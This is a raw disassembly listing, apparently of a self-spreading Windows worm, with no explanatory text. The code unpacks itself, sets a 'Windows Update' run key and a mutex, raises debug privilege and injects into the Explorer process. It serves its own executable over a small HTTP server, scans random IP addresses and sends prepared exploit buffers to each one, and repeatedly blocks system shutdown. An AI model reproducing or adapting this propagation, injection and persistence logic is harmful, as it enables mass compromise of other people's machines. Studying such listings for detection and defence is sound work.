cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0DEh
push offset dword_309046B8
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp eax, 46h
jl loc_30901D1D
cmp [ebp+var_730], 31h
jnz loc_30901BC8
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
push offset byte_309042B8
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_EA4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_30901084 ; lstrlenA
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_30902CB2 ; memcpy
mov eax, dword_30904BBE
add esp, 0Ch
mov [ebp+var_798], eax
loc_30901A69: ; CODE XREF: sub_309017D2+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 68h
push offset dword_309047FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0A0h
push offset dword_30904868
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
cmp [ebp+arg_0], 0
jz loc_30901CB8
push 68h
lea eax, [ebp+var_89E4]
push offset dword_30904A20
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_30902CB2 ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_30904A8C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_30902CB2 ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_30904B00
push eax
call sub_30902CB2 ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jz loc_30901D1D
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_30901D10
; ---------------------------------------------------------------------------
loc_30901BC8: ; CODE XREF: sub_309017D2+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_30902CA6 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_30904C70
push eax
call sub_30902CB2 ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_30904BF8
push eax
call sub_30902CB2 ; memcpy
add esp, 40h
push offset byte_309042B8
call sub_30902CAC ; strlen
push eax
lea eax, [ebp+var_21B0]
push offset byte_309042B8
push eax
call sub_30902CB2 ; memcpy
add esp, 10h
xor ecx, ecx
lea eax, [ebp+var_4833]
loc_30901C64: ; CODE XREF: sub_309017D2+4A8�j
mov dl, [ebp+ecx+var_2CD8]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 0DACh
jl short loc_30901C64
and [ebp+var_2CDC], 0
and [ebp+var_2CDB], 0
push 1C52h
lea eax, [ebp+var_89E4]
push 31h
push eax
call sub_30902CA6 ; memset
push 1C52h
lea eax, [ebp+var_690C]
push 31h
push eax
call sub_30902CA6 ; memset
add esp, 18h
jmp loc_30901A69
; ---------------------------------------------------------------------------
loc_30901CB8: ; CODE XREF: sub_309017D2+339�j
push 7Ch
lea eax, [ebp+var_1F28]
push offset dword_3090490C
push eax
call sub_30902CB2 ; memcpy
lea eax, [ebp+var_F44]
push 7D0h
push eax
lea eax, [ebp+var_1EAC]
push eax
call sub_30902CB2 ; memcpy
push 90h
lea eax, [ebp+var_16DC]
push offset dword_3090498C
push eax
call sub_30902CB2 ; memcpy
add esp, 24h
and [ebp+var_1231], 0
lea eax, [ebp+var_1F28]
push 0
push 0CF8h
loc_30901D10: ; CODE XREF: sub_309017D2+3F1�j
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
and [ebp+var_C], 0
loc_30901D1D: ; CODE XREF: sub_309017D2+1AD�j
; sub_309017D2+1E1�j ...
push 2
push [ebp+var_4]
call dword_30901170 ; shutdown
loc_30901D28: ; CODE XREF: sub_309017D2+166�j
push [ebp+var_4]
call dword_30901174 ; closesocket
pop esi
loc_30901D32: ; CODE XREF: sub_309017D2+37�j
mov eax, [ebp+var_C]
pop edi
pop ebx
leave
retn
sub_309017D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901D39 proc near ; CODE XREF: UPX0:loc_30902347�p
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 1Ch
push esi
push edi
push offset aAdvapi32 ; "advapi32"
call dword_309010A8 ; LoadLibraryA
mov esi, dword_309010A4
mov edi, eax
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_4], eax
jz short loc_30901DBD
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_8], eax
jz short loc_30901DBD
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
call esi ; GetProcAddress
mov esi, eax
test esi, esi
jz short loc_30901DBD
lea eax, [ebp+var_C]
push eax
push 20h
call dword_309010A0 ; GetCurrentProcess
push eax
call [ebp+var_4]
lea eax, [ebp+var_18]
mov [ebp+var_1C], 1
push eax
push offset aSedebugprivile ; "SeDebugPrivilege"
push 0
mov [ebp+var_10], 2
call [ebp+var_8]
push 0
push 0
lea eax, [ebp+var_1C]
push 10h
push eax
push 0
push [ebp+var_C]
call esi ; GetProcAddress
loc_30901DBD: ; CODE XREF: sub_30901D39+28�j
; sub_30901D39+37�j ...
pop edi
pop esi
leave
retn
sub_30901D39 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901DC1 proc near ; CODE XREF: UPX0:3090235B�p
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
mov ecx, dword_30904FD0
and [ebp+var_4], 0
push ebx
push esi
mov eax, [ecx+3Ch]
push edi
add eax, ecx
push offset aKernel32 ; "kernel32"
mov ecx, [eax+34h]
mov edi, [eax+50h]
mov [ebp+var_C], ecx
call dword_309010B4 ; GetModuleHandleA
mov esi, dword_309010A4
mov ebx, eax
push offset aVirtualallocex ; "VirtualAllocEx"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_10], eax
jnz short loc_30901E08
loc_30901E04: ; CODE XREF: sub_30901DC1+54�j
push 1
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E08: ; CODE XREF: sub_30901DC1+41�j
push offset aCreateremoteth ; "CreateRemoteThread"
push ebx
call esi ; GetProcAddress
test eax, eax
mov [ebp+var_14], eax
jz short loc_30901E04
push 0
push offset aShell_traywnd ; "Shell_TrayWnd"
call dword_30901110 ; FindWindowA
test eax, eax
jnz short loc_30901E36
call dword_30901114 ; GetForegroundWindow
test eax, eax
jnz short loc_30901E36
push 2
jmp short loc_30901E59
; ---------------------------------------------------------------------------
loc_30901E36: ; CODE XREF: sub_30901DC1+65�j
; sub_30901DC1+6F�j
lea ecx, [ebp+var_8]
push ecx
push eax
call dword_30901118 ; GetWindowThreadProcessId
push [ebp+var_8]
push 0
push 42Ah
call dword_309010B0 ; OpenProcess
mov ebx, eax
test ebx, ebx
jnz short loc_30901E5C
push 3
loc_30901E59: ; CODE XREF: sub_30901DC1+45�j
; sub_30901DC1+73�j
pop eax
jmp short loc_30901EC7
; ---------------------------------------------------------------------------
loc_30901E5C: ; CODE XREF: sub_30901DC1+94�j
push 4
push 3000h
push edi
push [ebp+var_C]
push ebx
call [ebp+var_10]
mov esi, dword_3090107C
test eax, eax
jz short loc_30901EBA
lea ecx, [ebp+var_10]
push ecx
push edi
push eax
push eax
push ebx
call dword_309010AC ; WriteProcessMemory
push dword_30904FC4
call esi ; CloseHandle
lea eax, [ebp+var_18]
xor edi, edi
push eax
push edi
push 1
push [ebp+arg_0]
push edi
push edi
push ebx
call [ebp+var_14]
cmp eax, edi
jz short loc_30901EA6
push eax
call esi ; CloseHandle
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EA6: ; CODE XREF: sub_30901DC1+DE�j
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov [ebp+var_4], 5
jmp short loc_30901EC1
; ---------------------------------------------------------------------------
loc_30901EBA: ; CODE XREF: sub_30901DC1+B2�j
mov [ebp+var_4], 4
loc_30901EC1: ; CODE XREF: sub_30901DC1+E3�j
; sub_30901DC1+F7�j
push ebx
call esi ; CloseHandle
mov eax, [ebp+var_4]
loc_30901EC7: ; CODE XREF: sub_30901DC1+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_30901DC1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901ECC proc near ; CODE XREF: sub_30902195+B�p
; UPX0:3090231D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_309010B8 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_309010EC ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_30901ECC endp
; =============== S U B R O U T I N E =======================================
sub_30901EFA proc near ; CODE XREF: sub_30901DC1+EA�p
; UPX0:30902327�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_309010BC ; CreateMutexA
retn
sub_30901EFA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F09 proc near ; CODE XREF: sub_30902383+15B�p
; sub_30902383+166�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
pop ebp
retn
sub_30901F09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F23 proc near ; CODE XREF: sub_30902195+12C�p
; sub_3090259A+5A�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_309010C0 ; CreateThread
push eax
call dword_3090107C ; CloseHandle
pop ebp
retn
sub_30901F23 endp
; =============== S U B R O U T I N E =======================================
sub_30901F44 proc near ; CODE XREF: sub_309011A0+68�p
; sub_30902A6B+3B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_30901F6C
loc_30901F55: ; CODE XREF: sub_30901F44+26�j
call dword_309010FC ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_30901F55
loc_30901F6C: ; CODE XREF: sub_30901F44+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_30901F44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901F74 proc near ; CODE XREF: sub_309011A0+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_30902CA6 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_309010C4 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_3090107C
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_30901F74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30901FCA proc near ; CODE XREF: sub_30902622+3E�p
; sub_309026E9+7�p ...
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3090114C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_30901FEB
call dword_30901150 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_30901FEB: ; CODE XREF: sub_30901FCA+15�j
lea eax, [ebp+var_34]
push eax
call dword_30901154 ; gethostbyname
test eax, eax
jnz short loc_30902000
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_30902000: ; CODE XREF: sub_30901FCA+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_30901FCA endp
; =============== S U B R O U T I N E =======================================
sub_30902009 proc near ; CODE XREF: sub_30902536+22�p
; sub_3090259A+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_30901130 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_30902009 endp
; =============== S U B R O U T I N E =======================================
sub_3090201F proc near ; CODE XREF: sub_30902383+40�p
; sub_30902383+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_309010CC ; OpenEventA
test eax, eax
jz short locret_30902038
push eax
call dword_309010C8 ; SetEvent
locret_30902038: ; CODE XREF: sub_3090201F+10�j
retn
sub_3090201F endp
; =============== S U B R O U T I N E =======================================
sub_30902039 proc near ; CODE XREF: sub_3090169C+30�p
push esi
mov esi, dword_309010FC
push edi
call esi ; rand
mov edi, eax
shl edi, 10h
call esi ; rand
or eax, edi
pop edi
pop esi
retn
sub_30902039 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090204F proc near ; DATA XREF: sub_30902195+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_3090116C ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_30902080
push 1
jmp loc_3090213B
; ---------------------------------------------------------------------------
loc_30902080: ; CODE XREF: sub_3090204F+28�j
mov esi, dword_30901104
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
lea eax, [ebp+var_100]
push offset dword_309041F0
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_3090214B
mov esi, dword_30901168
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push dword_30904FC0
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3090111C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_30902CAC ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_309020FD: ; CODE XREF: sub_3090204F+E8�j
mov eax, dword_30904FC0
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_3090210F
mov eax, ecx
loc_3090210F: ; CODE XREF: sub_3090204F+BC�j
test eax, eax
jz short loc_3090213E
push 0
push eax
mov eax, dword_30904FB8
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_30902139
cmp eax, 1000h
jb short loc_3090213E
push 64h
add edi, eax
call dword_30901094 ; Sleep
jmp short loc_309020FD
; ---------------------------------------------------------------------------
loc_30902139: ; CODE XREF: sub_3090204F+D5�j
push 2
loc_3090213B: ; CODE XREF: sub_3090204F+2C�j
pop eax
jmp short loc_3090218E
; ---------------------------------------------------------------------------
loc_3090213E: ; CODE XREF: sub_3090204F+C2�j
; sub_3090204F+DC�j
push offset dword_30904FBC
call dword_309010D4 ; InterlockedIncrement
jmp short loc_30902169
; ---------------------------------------------------------------------------
loc_3090214B: ; CODE XREF: sub_3090204F+49�j
; sub_3090204F+61�j
mov esi, dword_30901168
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_30904D38
push ebx
call esi ; send
loc_30902169: ; CODE XREF: sub_3090204F+FA�j
push 7D0h
call dword_30901094 ; Sleep
push 2
push ebx
call dword_30901170 ; shutdown
push ebx
call dword_30901174 ; closesocket
push 0
call dword_309010D0 ; ExitThread
xor eax, eax
loc_3090218E: ; CODE XREF: sub_3090204F+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_3090204F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902195 proc near ; DATA XREF: sub_30902383+156�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_30901ECC
lea eax, [ebp+var_130]
push 104h
push eax
push offset aWindowsUpdate ; "Windows Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_30904FBC, ebx
call sub_30902859
add esp, 14h
test eax, eax
jnz loc_309022CA
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_30901080 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_30902201
push 1
call dword_309010D0 ; ExitThread
loc_30902201: ; CODE XREF: sub_30902195+62�j
push ebx
push esi
call dword_309010DC ; GetFileSize
push eax
mov dword_30904FC0, eax
call sub_30902C75
pop ecx
mov dword_30904FB8, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_30904FC0
push eax
push esi
call dword_309010D8 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_30904FC0, eax
call dword_3090107C ; CloseHandle
push ebx
push 1
push 2
call dword_30901158 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_30902CA6 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_30902263: ; CODE XREF: sub_30902195+E5�j
; sub_30902195+ED�j ...
call dword_309010FC ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov dword_30904FCC, eax
jz short loc_30902263
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_30902263
push eax
call dword_30901160 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_30901140 ; bind
test eax, eax
jnz short loc_30902263
push 64h
push edi
call dword_30901144 ; listen
mov [ebp+var_8], esi
pop esi
loc_309022AC: ; CODE XREF: sub_30902195+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_30901148 ; accept
push eax
push offset sub_3090204F
call sub_30901F23
pop ecx
pop ecx
jmp short loc_309022AC
; ---------------------------------------------------------------------------
loc_309022CA: ; CODE XREF: sub_30902195+3D�j
push ebx
call dword_309010D0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_30902195 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_309022D9 proc near ; CODE XREF: sub_30902383:loc_309024D3�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3090113C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_309022D9 endp
; ---------------------------------------------------------------------------
loc_30902305: ; CODE XREF: UPX1:30906C68�j
push 0
call dword_309010B4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov dword_30904FD0, eax
call dword_30901074 ; DeleteFileA
call sub_30901ECC
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
call dword_309010E4 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_30902347
push 1
call dword_309010E0 ; ExitProcess
loc_30902347: ; CODE XREF: UPX0:3090233D�j
call sub_30901D39
call sub_309029BD
call sub_30902B37
push offset sub_30902383
call sub_30901DC1
test eax, eax
pop ecx
jz short loc_3090236C
push 0
call sub_30902383
loc_3090236C: ; CODE XREF: UPX0:30902363�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_3090236F proc near ; CODE XREF: sub_30902383:loc_309024FC�p
; sub_30902536:loc_3090254F�p ...
push 0
push dword_30904FC8
call dword_30901070 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_3090236F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902383 proc near ; CODE XREF: UPX0:30902367�p
; DATA XREF: UPX0:30902356�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_30901190
push offset loc_30902CA0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU17x ; "u17x"
xor edi, edi
push edi
push 1
push edi
call dword_3090106C ; CreateEventA
mov dword_30904FC8, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU11x ; "u11x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU12x ; "u12x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU13x ; "u13x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU14x ; "u14x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU15x ; "u15x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU16x ; "u16x"
call sub_3090201F
mov [esp+0Ch+var_C], offset aU8 ; "u8"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU9 ; "u9"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU10 ; "u10"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU11 ; "u11"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU12 ; "u12"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13 ; "u13"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU13i ; "u13i"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU14 ; "u14"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU15 ; "u15"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU16 ; "u16"
call sub_30901EFA
mov [esp+0Ch+var_C], offset aU17 ; "u17"
call sub_30901EFA
pop ecx
cmp [ebp+arg_0], edi
jz short loc_309024D3
push offset aWs2_32 ; "ws2_32"
mov esi, dword_309010A8
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm17 ; "uterm17"
call sub_30901EFA
pop ecx
mov dword_30904FC4, eax
loc_309024D3: ; CODE XREF: sub_30902383+115�j
call sub_309022D9
push edi
push offset sub_30902195
call sub_30901F09
push edi
push offset sub_3090169C
call sub_30901F09
push edi
push offset loc_30902745
call sub_30901F09
add esp, 18h
loc_309024FC: ; CODE XREF: sub_30902383+194�j
call sub_3090236F
test eax, eax
jnz short loc_30902519
push edi
call dword_30901018 ; AbortSystemShutdownA
push 1388h
call dword_30901094 ; Sleep
jmp short loc_309024FC
; ---------------------------------------------------------------------------
loc_30902519: ; CODE XREF: sub_30902383+180�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_2
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_30902383 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902536 proc near ; DATA XREF: sub_3090259A+55�o
; sub_30902622+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_30902545
push 1
pop eax
jmp short locret_30902596
; ---------------------------------------------------------------------------
loc_30902545: ; CODE XREF: sub_30902536+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_3090254F: ; CODE XREF: sub_30902536+5A�j
call sub_3090236F
test eax, eax
jnz short loc_30902592
call sub_30902009
test eax, eax
jz short loc_30902592
cmp [ebp+var_1], bl
jz short loc_3090258B
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_309017D2
movzx esi, word_30904FDC
pop ecx
call dword_309010FC ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_30901094 ; Sleep
loc_3090258B: ; CODE XREF: sub_30902536+2E�j
inc bl
cmp bl, 0FFh
jb short loc_3090254F
loc_30902592: ; CODE XREF: sub_30902536+20�j
; sub_30902536+29�j
pop esi
xor eax, eax
pop ebx
locret_30902596: ; CODE XREF: sub_30902536+D�j
leave
retn 4
sub_30902536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3090259A proc near ; DATA XREF: sub_30902622+7E�o
; UPX0:309027DA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_309025A8
push 1
pop eax
jmp short loc_3090261E
; ---------------------------------------------------------------------------
loc_309025A8: ; CODE XREF: sub_3090259A+7�j
push ebx
push esi
push edi
call sub_30901ECC
mov esi, dword_309010FC
xor ebx, ebx
loc_309025B8: ; CODE XREF: sub_3090259A+7D�j
call sub_3090236F
test eax, eax
jnz short loc_30902619
call sub_30902009
test eax, eax
jz short loc_30902619
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_30904FD4
mov byte ptr [ebp+arg_0+3], al
call dword_309010D4 ; InterlockedIncrement
push [ebp+arg_0]
call sub_309017D2
test eax, eax
pop ecx
jnz short loc_309025FB
push [ebp+arg_0]
push offset sub_30902536
call sub_30901F23
pop ecx
pop ecx
loc_309025FB: ; CODE XREF: sub_3090259A+50�j
movzx edi, word_30904FDC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_30901094 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_309025B8
loc_30902619: ; CODE XREF: sub_3090259A+25�j
; sub_3090259A+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_3090261E: ; CODE XREF: sub_3090259A+C�j
pop ebp
retn 4
sub_3090259A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_30902622 proc near ; DATA XREF: UPX0:309027F2�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_30901ECC
call sub_3090236F
test eax, eax
jnz loc_309026DB
push ebx
mov ebx, dword_30901094
push esi
mov esi, dword_309010FC
push edi
loc_30902648: ; CODE XREF: sub_30902622+48�j
; sub_30902622+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_30902657: ; CODE XREF: sub_30902622+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_30902657
call sub_30901FCA
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_30902648
call sub_30902009
test eax, eax
jz short loc_309026B3
push offset dword_30904FD4
